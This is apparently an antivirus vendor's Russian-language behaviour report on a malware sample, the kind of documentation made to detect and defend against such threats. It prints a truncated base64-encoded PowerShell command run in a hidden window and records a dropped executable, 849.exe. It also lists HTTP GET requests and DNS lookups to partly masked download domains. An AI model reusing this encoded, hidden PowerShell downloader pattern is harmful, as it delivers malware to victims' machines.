Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9AC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\849.exe
Удаляет следующие файлы
- %HOMEPATH%\849.exe
Подменяет следующие файлы
- %HOMEPATH%\849.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://nw##vcs.com/cgi-bin/uz6_qs8_qr/
- http://od####resources.com/cgi-bin/3_o_but9/
- http://od####resources.com/cgi-sys/suspendedpage.cgi
- http://on####hyoucd.com/_mm/oix_ktcpc_dljhsex/
- http://on####hyoucd.com/cgi-sys/suspendedpage.cgi
- http://www.pi####teitinera.net/n_g2o4_jumkt4/
- http://www.pi####teitinera.net/404-error.html
UDP
- DNS ASK nw##vcs.com
- DNS ASK od####resources.com
- DNS ASK on####mdesign.com
- DNS ASK on####hyoucd.com
- DNS ASK pi####teitinera.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaAEMAUQBEAFgAeABwAGIAPQAnAFoAWABHAE0ASwBjAHgAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAQwBVAGAAUgBgAGkAVAB5AHAAcgBPAFQAYABPAEMATwBMACIAIAA9AC...' (со скрытым окном)
